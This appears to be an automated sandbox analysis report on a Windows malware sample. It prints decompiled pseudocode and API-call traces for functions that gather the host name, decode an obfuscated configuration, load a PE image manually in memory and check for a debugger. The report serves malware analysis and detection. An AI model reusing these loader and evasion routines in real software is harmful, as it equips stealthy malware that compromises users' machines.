                • Instruction ID: d7b74c41736f2584a1ad28428d110950dd1cce7b0d3bc18a4e23aab35ff85279
                • Opcode Fuzzy Hash: b3f3c9c7fa74f62a993e4ee658d76b7bd8eaea101f56c02d2ae2e011aaec50cf
                • Instruction Fuzzy Hash: 6511BE7210460EDFDB16EFE5C848E8777EEAB06304F010915E558D7190EB70E498CB62
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E001D3F0E(void* __ecx) {
                				signed int _v8;
                				void* _t15;
                				void* _t19;
                				void* _t20;
                				void* _t22;
                				intOrPtr* _t23;
                
                				_t23 = __imp__;
                				_t20 = 0;
                				_v8 = _v8 & 0;
                				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                				_t10 = _v8;
                				if(_v8 != 0) {
                					_t20 = E001D7E20(_t10 + 1);
                					if(_t20 != 0) {
                						_t15 =  *_t23(3, _t20,  &_v8); // executed
                						if(_t15 != 0) {
                							 *((char*)(_v8 + _t20)) = 0;
                						} else {
                							E001DA5FA(_t20);
                							_t20 = 0;
                						}
                					}
                				}
                				return _t20;
                			}

                APIs
                • GetComputerNameExA.KERNELBASE(00000003,00000000,001D29CE,74B5F710,00000000,?,?,001D29CE), ref: 001D3F26
                  • Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C
                • GetComputerNameExA.KERNELBASE(00000003,00000000,001D29CE,001D29CF,?,?,001D29CE), ref: 001D3F43
                  • Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: ComputerHeapName$AllocateFree
                • String ID:
                • API String ID: 187446995-0
                • Opcode ID: 33ac2529ad797046058411f81378a7626e10e620ad1057bd044e94f95428c948
                • Instruction ID: 243656fe086109931eb900768ca172f50282bc7348340cdc924879d0c3817e5f
                • Opcode Fuzzy Hash: 33ac2529ad797046058411f81378a7626e10e620ad1057bd044e94f95428c948
                • Instruction Fuzzy Hash: D3F09037A0010AAAEB11D79ADC00EAF6BBCDBC0700F110056B918D3280EB70EF018662
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                				intOrPtr _t4;
                				void* _t10;
                				void* _t11;
                				void* _t12;
                				void* _t14;
                
                				_t14 = 1;
                				_t4 = _a8;
                				if(_t4 == 0) {
                					if(InterlockedDecrement(0x1dd23c) == 0) {
                						E001D469F();
                					}
                				} else {
                					if(_t4 == 1 && InterlockedIncrement(0x1dd23c) == 1) {
                						_t10 = E001D523A(_t11, _t12, _a4); // executed
                						if(_t10 != 0) {
                							_t14 = 0;
                						}
                					}
                				}
                				return _t14;
                			}

                APIs
                • InterlockedIncrement.KERNEL32(001DD23C), ref: 001D646B
                  • Part of subcall function 001D523A: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,001D647E,?), ref: 001D524D
                • InterlockedDecrement.KERNEL32(001DD23C), ref: 001D648B
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: Interlocked$CreateDecrementHeapIncrement
                • String ID:
                • API String ID: 3834848776-0
                • Opcode ID: 483fcc3514291438ed83c465d0cab0cdace5aeffde536f01ec7e3d83a9ee04e9
                • Instruction ID: eef629a94fca62a6dc2eae405c5c8e32da44e4ed1d689ede73e0c2e0b48cd90a
                • Opcode Fuzzy Hash: 483fcc3514291438ed83c465d0cab0cdace5aeffde536f01ec7e3d83a9ee04e9
                • Instruction Fuzzy Hash: C9E086352C6222A3D72127749C0475EA741AB71799F01891FF486D1390C720DCC0D6D1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualProtectEx.KERNELBASE(000000FF,6E2CB428,0000311C,00000040,6E2C9B0C), ref: 6E278058
                Memory Dump Source
                • Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 75b9d9ea45c702e07089079525561a67c6f51e6cf4e01e87130c30df609aa9e9
                • Instruction ID: a1e582854bca625b96c46d89573d95dd9aa2b686df78d7d56fd599bbbd57d549
                • Opcode Fuzzy Hash: 75b9d9ea45c702e07089079525561a67c6f51e6cf4e01e87130c30df609aa9e9
                • Instruction Fuzzy Hash: 8681EF70D08918DBCF18CF6DC99CA25BBA3BF4A30C3048A2AE64987345D6F4A484CF74
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 34%
                			E001D497C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                				intOrPtr _v12;
                				void* _v18;
                				char _v20;
                				intOrPtr _t15;
                				void* _t17;
                				intOrPtr _t19;
                				void* _t23;
                
                				_v20 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosw");
                				_t15 =  *0x1dd2a4; // 0x2dca5a8
                				_t4 = _t15 + 0x1de39c; // 0x2fa8944
                				_t20 = _t4;
                				_t6 = _t15 + 0x1de124; // 0x650047
                				_t17 = E001D59F9(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                				if(_t17 < 0) {
                					_t23 = _t17;
                				} else {
                					_t23 = 8;
                					if(_v20 != _t23) {
                						_t23 = 1;
                					} else {
                						_t19 = E001D7E65(_t20, _v12);
                						if(_t19 != 0) {
                							 *_a16 = _t19;
                							_t23 = 0;
                						}
                						__imp__#6(_v12);
                					}
                				}
                				return _t23;
                			}

                APIs
                  • Part of subcall function 001D59F9: SysFreeString.OLEAUT32(?), ref: 001D5AD8
                  • Part of subcall function 001D7E65: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,001D1459,004F0053,00000000,?), ref: 001D7E6E
                  • Part of subcall function 001D7E65: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,001D1459,004F0053,00000000,?), ref: 001D7E98
                  • Part of subcall function 001D7E65: memset.NTDLL ref: 001D7EAC
                • SysFreeString.OLEAUT32(00000000), ref: 001D49DF
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: FreeString$lstrlenmemcpymemset
                • String ID:
                • API String ID: 397948122-0
                • Opcode ID: c19e77d35dd895209090da0d7602eef9384fec839af8037c82fc9c7553361e3a
                • Instruction ID: f0512ff9666c5be5aead976cba1cc2e359eaadf3b3ec2337de0b7cbcb81b2352
                • Opcode Fuzzy Hash: c19e77d35dd895209090da0d7602eef9384fec839af8037c82fc9c7553361e3a
                • Instruction Fuzzy Hash: 2001713650112ABFDF25AFA9CC019ABBBB9FB08354F010466F944E7261E3709D52C791
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6E28173D,?), ref: 6E281BC6
                Memory Dump Source
                • Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: CreateHeap
                • String ID:
                • API String ID: 10892065-0
                • Opcode ID: 483b2f35660c5bdd1962abfe5b0416df88a4bd157d6527bbd394ccbcaad989ab
                • Instruction ID: 979237c94ca83251f38fa3d8fdcc203498a54548063c7a51e60539beca9bf256
                • Opcode Fuzzy Hash: 483b2f35660c5bdd1962abfe5b0416df88a4bd157d6527bbd394ccbcaad989ab
                • Instruction Fuzzy Hash: 66D02E32950B085ADB004EB2A80CB623BDDC386BA6F004832B90CC6080F6B0C084CA10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E6E2410BC(void* __eax, intOrPtr _a4) {
                
                				 *0x6e244150 =  *0x6e244150 & 0x00000000;
                				_push(0);
                				_push(0x6e24414c);
                				_push(1);
                				_push(_a4);
                				 *0x6e244148 = 0xc; // executed
                				L6E2410E2(); // executed
                				return __eax;
                			}

                APIs
                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6E241451,00000001,6E24414C,00000000), ref: 6E2410DA
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID: DescriptorSecurity$ConvertString
                • String ID:
                • API String ID: 3907675253-0
                • Opcode ID: d938f83e9c4193f638fe24f424c6fc5de47722adc42318572eecd0593dd4b988
                • Instruction ID: aa256b7d81c75e77a3c09c269a97cf69c6176281e93fd7d686aeac8e3d7a8aa7
                • Opcode Fuzzy Hash: d938f83e9c4193f638fe24f424c6fc5de47722adc42318572eecd0593dd4b988
                • Instruction Fuzzy Hash: 9AC04CF8150784E7EB25AFC0CC49F457B537761705F654504F618252C083F51059C525
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __encode_pointer.LIBCMT ref: 6E2830B4
                  • Part of subcall function 6E283040: RtlEncodePointer.NTDLL(00000000,?,6E2830B9,00000000,6E286D8F,6E2CB748,00000000,00000314,?,6E282D8E,6E2CB748,6E2AF8D0,00012010), ref: 6E2830A7
                Memory Dump Source
                • Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: EncodePointer__encode_pointer
                • String ID:
                • API String ID: 4150071819-0
                • Opcode ID: eb08a0bf7b6e8c3d7dc2c6ad7d3a54e248f4a5f833920566f578a1624b4a0c82
                • Instruction ID: f72adfadcf089c0e06255bea16268a7781b1895133ffda6bd4711a94e519fdd4
                • Opcode Fuzzy Hash: eb08a0bf7b6e8c3d7dc2c6ad7d3a54e248f4a5f833920566f578a1624b4a0c82
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E6E241699(void* __eax) {
                				char _v8;
                				void* _v12;
                				void* __edi;
                				void* _t18;
                				long _t26;
                				long _t29;
                				intOrPtr _t40;
                				void* _t41;
                				intOrPtr* _t42;
                				void* _t44;
                
                				_t41 = __eax;
                				_t16 =  *0x6e244140;
                				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e244140 - 0x63698bc4 &  !( *0x6e244140 - 0x63698bc4);
                				_t18 = E6E24150D( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e244140 - 0x63698bc4 &  !( *0x6e244140 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e244140 - 0x63698bc4 &  !( *0x6e244140 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                				if(_t18 != 0) {
                					_t29 = 8;
                					goto L8;
                				} else {
                					_t40 = _v8;
                					_t29 = E6E241000(_t33, _t40, _t41);
                					if(_t29 == 0) {
                						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                						_t29 = E6E2417FA(_t40, _t44);
                						if(_t29 == 0) {
                							_t26 = E6E241E32(_t44, _t40); // executed
                							_t29 = _t26;
                							if(_t29 == 0) {
                								_push(_t26);
                								_push(1);
                								_push(_t40);
                								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                									_t29 = GetLastError();
                								}
                							}
                						}
                					}
                					_t42 = _v12;
                					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                					E6E24133D(_t42);
                					L8:
                					return _t29;
                				}
                			}

                APIs
                  • Part of subcall function 6E24150D: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E2416D5,?,?,?,?,?,00000002,?,6E2414D0), ref: 6E241531
                  • Part of subcall function 6E24150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E241553
                  • Part of subcall function 6E24150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E241569
                  • Part of subcall function 6E24150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E24157F
                  • Part of subcall function 6E24150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E241595
                  • Part of subcall function 6E24150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E2415AB
                  • Part of subcall function 6E241000: memcpy.NTDLL(?,?,?), ref: 6E241037
                  • Part of subcall function 6E241000: memcpy.NTDLL(?,?,?), ref: 6E24106C
                  • Part of subcall function 6E2417FA: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6E241832
                  • Part of subcall function 6E241E32: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E241E6B
                  • Part of subcall function 6E241E32: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E241EE0
                  • Part of subcall function 6E241E32: GetLastError.KERNEL32 ref: 6E241EE6
                • GetLastError.KERNEL32(?,6E2414D0), ref: 6E241717
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                • String ID:
                • API String ID: 2673762927-0
                • Opcode ID: b7208e218090d8fb1511ddedd1cdc4af0ee0a5b2aed4150457dfb7c0bf60c95a
                • Instruction ID: c6e06acaa46a78a842ffb3dd80640ff24b826b6543ea401182b2fbc6b5d3ea08
                • Opcode Fuzzy Hash: b7208e218090d8fb1511ddedd1cdc4af0ee0a5b2aed4150457dfb7c0bf60c95a
                • Instruction Fuzzy Hash: 62112E7A60070AEBC7159BE9CC84DDB77BEAF442197040514EA0297645D7F0EE5E87A0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 70%
                			E001D67C4(void* __ecx, signed char* _a4) {
                				void* _v8;
                				void* _t8;
                				signed short _t11;
                				signed int _t12;
                				signed int _t14;
                				intOrPtr _t15;
                				void* _t19;
                				signed short* _t22;
                				void* _t24;
                				intOrPtr* _t27;
                
                				_t24 = 0;
                				_push(0);
                				_t19 = 1;
                				_t27 = 0x1dd330;
                				E001D9186();
                				while(1) {
                					_t8 = E001D4C3B(_a4,  &_v8); // executed
                					if(_t8 == 0) {
                						break;
                					}
                					_push(_v8);
                					_t14 = 0xd;
                					_t15 = E001D1546(_t14);
                					if(_t15 == 0) {
                						HeapFree( *0x1dd238, 0, _v8);
                						break;
                					} else {
                						 *_t27 = _t15;
                						_t27 = _t27 + 4;
                						_t24 = _t24 + 1;
                						if(_t24 < 3) {
                							continue;
                						} else {
                						}
                					}
                					L7:
                					_push(1);
                					E001D9186();
                					if(_t19 != 0) {
                						_t22 =  *0x1dd338; // 0x2fa9b70
                						_t11 =  *_t22 & 0x0000ffff;
                						if(_t11 < 0x61 || _t11 > 0x7a) {
                							_t12 = _t11 & 0x0000ffff;
                						} else {
                							_t12 = (_t11 & 0x0000ffff) - 0x20;
                						}
                						 *_t22 = _t12;
                					}
                					return _t19;
                				}
                				_t19 = 0;
                				goto L7;
                			}














                APIs
                  • Part of subcall function 001D9186: GetProcAddress.KERNEL32(36776F57,001D67DC), ref: 001D91A1
                  • Part of subcall function 001D4C3B: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 001D4C66
                  • Part of subcall function 001D4C3B: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 001D4C88
                  • Part of subcall function 001D4C3B: memset.NTDLL ref: 001D4CA2
                  • Part of subcall function 001D4C3B: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 001D4CE0
                  • Part of subcall function 001D4C3B: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D4CF4
                  • Part of subcall function 001D4C3B: CloseHandle.KERNEL32(00000000), ref: 001D4D0B
                  • Part of subcall function 001D4C3B: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 001D4D17
                  • Part of subcall function 001D4C3B: lstrcat.KERNEL32(?,642E2A5C), ref: 001D4D58
                  • Part of subcall function 001D4C3B: FindFirstFileA.KERNELBASE(?,?), ref: 001D4D6E
                  • Part of subcall function 001D1546: lstrlen.KERNEL32(?,00000000,001DD330,00000001,001D67F7,001DD00C,001DD00C,00000000,00000005,00000000,00000000,?,?,?,001D41AA,001D5D90), ref: 001D154F
                  • Part of subcall function 001D1546: mbstowcs.NTDLL ref: 001D1576
                  • Part of subcall function 001D1546: memset.NTDLL ref: 001D1588
                • HeapFree.KERNEL32(00000000,001DD00C,001DD00C,001DD00C,00000000,00000005,00000000,00000000,?,?,?,001D41AA,001D5D90,001DD00C,?,001D5D90), ref: 001D6813
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: FileHeap$Allocatememset$AddressCloseCreateFindFirstFreeHandleProcTimelstrcatlstrlenmbstowcs
                • String ID:
                • API String ID: 172136534-0
                • Opcode ID: 110883b9ab8f9c4c18e5d85b39f931f69f8578a0581d73e35fb7ef2f7717ccce
                • Instruction ID: 91e9ee853fe8a51f3d71d1576cdcf2eaa9ac01d68e5c98b6b89c443afbd8e12d
                • Opcode Fuzzy Hash: 110883b9ab8f9c4c18e5d85b39f931f69f8578a0581d73e35fb7ef2f7717ccce
                • Instruction Fuzzy Hash: 7E016436600305BBEB005FE6DD80B7A7BAAEB913A0F50003BF940CA360C7649C81B360
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E001D4B9D(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                				void* _t21;
                				void* _t22;
                				signed int _t24;
                				intOrPtr* _t26;
                				void* _t27;
                
                				_t26 = __edi;
                				if(_a4 == 0) {
                					L2:
                					_t27 = E001D5AF6(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                					if(_t27 == 0) {
                						_t24 = _a12 >> 1;
                						if(_t24 == 0) {
                							_t27 = 2;
                							HeapFree( *0x1dd238, 0, _a4);
                						} else {
                							_t21 = _a4;
                							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                							 *_t26 = _t21;
                						}
                					}
                					L6:
                					return _t27;
                				}
                				_t22 = E001D497C(_a4, _a8, _a12, __edi); // executed
                				_t27 = _t22;
                				if(_t27 == 0) {
                					goto L6;
                				}
                				goto L2;
                			}









                APIs
                  • Part of subcall function 001D497C: SysFreeString.OLEAUT32(00000000), ref: 001D49DF
                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,001D57D8,?,004F0053,02FA9388,00000000,?), ref: 001D4C00
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: Free$HeapString
                • String ID:
                • API String ID: 3806048269-0
                • Opcode ID: 8c45bfe206910f3c48433e54fce6b8612897a160e19671e86417c9965d188278
                • Instruction ID: 5d171b13dc1aeb60b282482cfc9d3709842cf0b0d8d9ca4e23323efe440b1e8f
                • Opcode Fuzzy Hash: 8c45bfe206910f3c48433e54fce6b8612897a160e19671e86417c9965d188278
                • Instruction Fuzzy Hash: D0011D72501529BBCF22DF98CC01FEA7BA5EF58790F05812AFE099A261D731D960DBD0
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                C-Code - Quality: 92%
                			E001D696A(int* __ecx) {
                				int _v8;
                				void* _v12;
                				void* __esi;
                				signed int _t20;
                				signed int _t25;
                				char* _t31;
                				char* _t32;
                				char* _t33;
                				char* _t34;
                				char* _t35;
                				void* _t36;
                				void* _t37;
                				void* _t38;
                				intOrPtr _t39;
                				void* _t41;
                				intOrPtr _t42;
                				intOrPtr _t43;
                				signed int _t46;
                				intOrPtr _t49;
                				signed int _t50;
                				signed int _t55;
                				void* _t57;
                				void* _t58;
                				signed int _t60;
                				signed int _t64;
                				signed int _t68;
                				signed int _t72;
                				signed int _t76;
                				signed int _t80;
                				void* _t85;
                				intOrPtr _t102;
                
                				_t86 = __ecx;
                				_t20 =  *0x1dd2a0; // 0x63699bc3
                				if(E001DA4D4( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
                					 *0x1dd2d4 = _v12;
                				}
                				_t25 =  *0x1dd2a0; // 0x63699bc3
                				if(E001DA4D4( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
                					_push(2);
                					_pop(0);
                					goto L60;
                				} else {
                					_t85 = _v12;
                					if(_t85 == 0) {
                						_t31 = 0;
                					} else {
                						_t80 =  *0x1dd2a0; // 0x63699bc3
                						_t31 = E001D7FC0(_t86, _t85, _t80 ^ 0x724e87bc);
                					}
                					if(_t31 != 0) {
                						_t86 =  &_v8;
                						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                							 *0x1dd240 = _v8;
                						}
                					}
                					if(_t85 == 0) {
                						_t32 = 0;
                					} else {
                						_t76 =  *0x1dd2a0; // 0x63699bc3
                						_t32 = E001D7FC0(_t86, _t85, _t76 ^ 0x2b40cc40);
                					}
                					if(_t32 != 0) {
                						_t86 =  &_v8;
                						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                							 *0x1dd244 = _v8;
                						}
                					}
                					if(_t85 == 0) {
                						_t33 = 0;
                					} else {
                						_t72 =  *0x1dd2a0; // 0x63699bc3
                						_t33 = E001D7FC0(_t86, _t85, _t72 ^ 0x3b27c2e6);
                					}
                					if(_t33 != 0) {
                						_t86 =  &_v8;
                						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                							 *0x1dd248 = _v8;
                						}
                					}
                					if(_t85 == 0) {
                						_t34 = 0;
                					} else {
                						_t68 =  *0x1dd2a0; // 0x63699bc3
                						_t34 = E001D7FC0(_t86, _t85, _t68 ^ 0x0602e249);
                					}
                					if(_t34 != 0) {
                						_t86 =  &_v8;
                						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
                							 *0x1dd004 = _v8;
                						}
                					}
                					if(_t85 == 0) {
                						_t35 = 0;
                					} else {
                						_t64 =  *0x1dd2a0; // 0x63699bc3
                						_t35 = E001D7FC0(_t86, _t85, _t64 ^ 0x3603764c);
                					}
                					if(_t35 != 0) {
                						_t86 =  &_v8;
                						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
                							E001DD02C = _v8;
                						}
                					}
                					if(_t85 == 0) {
                						_t36 = 0;
                					} else {
                						_t60 =  *0x1dd2a0; // 0x63699bc3
                						_t36 = E001D7FC0(_t86, _t85, _t60 ^ 0x2cc1f2fd);
                					}
                					if(_t36 != 0) {
                						_push(_t36);
                						_t57 = 0x10;
                						_t58 = E001D89D2(_t57);
                						if(_t58 != 0) {
                							_push(_t58);
                							E001D5DDD();
                						}
                					}
                					if(_t85 == 0) {
                						_t37 = 0;
                					} else {
                						_t55 =  *0x1dd2a0; // 0x63699bc3
                						_t37 = E001D7FC0(_t86, _t85, _t55 ^ 0xb30fc035);
                					}
                					if(_t37 != 0 && E001D89D2(0, _t37) != 0) {
                						_t102 =  *0x1dd32c; // 0x2fa95b0
                						E001D804C(_t102 + 4, _t53);
                					}
                					if(_t85 == 0) {
                						_t38 = 0;
                					} else {
                						_t50 =  *0x1dd2a0; // 0x63699bc3
                						_t38 = E001D7FC0(_t86, _t85, _t50 ^ 0x372ab5b7);
                					}
                					if(_t38 == 0) {
                						L51:
                						_t39 =  *0x1dd2a4; // 0x2dca5a8
                						_t18 = _t39 + 0x1de252; // 0x616d692f
                						 *0x1dd2d0 = _t18;
                						goto L52;
                					} else {
                						_t49 = E001D89D2(0, _t38);
                						 *0x1dd2d0 = _t49;
                						if(_t49 != 0) {
                							L52:
                							if(_t85 == 0) {
                								_t41 = 0;
                							} else {
                								_t46 =  *0x1dd2a0; // 0x63699bc3
                								_t41 = E001D7FC0(_t86, _t85, _t46 ^ 0xd8dc5cde);
                							}
                							if(_t41 == 0) {
                								_t42 =  *0x1dd2a4; // 0x2dca5a8
                								_t19 = _t42 + 0x1de791; // 0x6976612e
                								_t43 = _t19;
                							} else {
                								_t43 = E001D89D2(0, _t41);
                							}
                							 *0x1dd340 = _t43;
                							HeapFree( *0x1dd238, 0, _t85);
                							L60:
                							return 0;
                						}
                						goto L51;
                					}
                				}
                			}



































                APIs
                • StrToIntExA.SHLWAPI(00000000,00000000,?,001D5D85,?,63699BC3,001D5D85,?,63699BC3,00000005,001DD00C,00000008,?,001D5D85), ref: 001D69EF
                • StrToIntExA.SHLWAPI(00000000,00000000,?,001D5D85,?,63699BC3,001D5D85,?,63699BC3,00000005,001DD00C,00000008,?,001D5D85), ref: 001D6A21
                • StrToIntExA.SHLWAPI(00000000,00000000,?,001D5D85,?,63699BC3,001D5D85,?,63699BC3,00000005,001DD00C,00000008,?,001D5D85), ref: 001D6A53
                • StrToIntExA.SHLWAPI(00000000,00000000,?,001D5D85,?,63699BC3,001D5D85,?,63699BC3,00000005,001DD00C,00000008,?,001D5D85), ref: 001D6A85
                • StrToIntExA.SHLWAPI(00000000,00000000,?,001D5D85,?,63699BC3,001D5D85,?,63699BC3,00000005,001DD00C,00000008,?,001D5D85), ref: 001D6AB7
                • HeapFree.KERNEL32(00000000,001D5D85,001D5D85,?,63699BC3,001D5D85,?,63699BC3,00000005,001DD00C,00000008,?,001D5D85), ref: 001D6BAE
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 4b25d8737787ea5f73079f13706dda019b43bcf7e79cd0b72a385336e5247876
                • Instruction ID: 2db6b1d92e4b91867c8e68038f0a01f184303c34830090228d0dc306e47a5d17
                • Opcode Fuzzy Hash: 4b25d8737787ea5f73079f13706dda019b43bcf7e79cd0b72a385336e5247876
                • Instruction Fuzzy Hash: 19618F70B12114AECB20EBB8ADC9C6B77EDEB887007744927A441E7359FB34DD858B21
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsDebuggerPresent.KERNEL32 ref: 6E2856C7
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E2856DC
                • UnhandledExceptionFilter.KERNEL32(6E2AFA48), ref: 6E2856E7
                • GetCurrentProcess.KERNEL32(C0000409), ref: 6E285703
                • TerminateProcess.KERNEL32(00000000), ref: 6E28570A
                Memory Dump Source
                • Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID:
                • API String ID: 2579439406-0
                • Opcode ID: 788efda50812f887afd7825c6a3145e86c3dd754309af492bc074fc826170125
                • Instruction ID: 526dc63793b17d5a37da057f743e3237281c9d7fc359027ad85e1321952faa65
                • Opcode Fuzzy Hash: 788efda50812f887afd7825c6a3145e86c3dd754309af492bc074fc826170125
                • Instruction Fuzzy Hash: 2C2116B8900A08DFCF81CF68C94C6457BB6FB0AB06F50481AEA0A8738CE7B45585CF75
